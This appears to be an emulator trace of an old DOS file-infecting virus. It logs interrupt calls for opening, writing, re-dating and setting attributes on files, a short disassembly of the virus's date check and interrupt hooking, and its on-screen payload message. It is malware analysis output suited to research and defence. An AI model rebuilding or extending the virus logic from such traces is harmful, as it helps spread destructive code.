2018-12-25T11:59:11.370536637Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.381089796Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:11.384059492Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:11.389916106Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:11.392712231Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:11.401485545Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:11.404008923Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:11.411525464Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:11.421276355Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:11.425056254Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:11.43203803Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:11.438442415Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:11.440988241Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:11.443486432Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:11.447740666Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:11.450929966Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:11.460720101Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:11.462092444Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:11.465257688Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:11.470794266Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')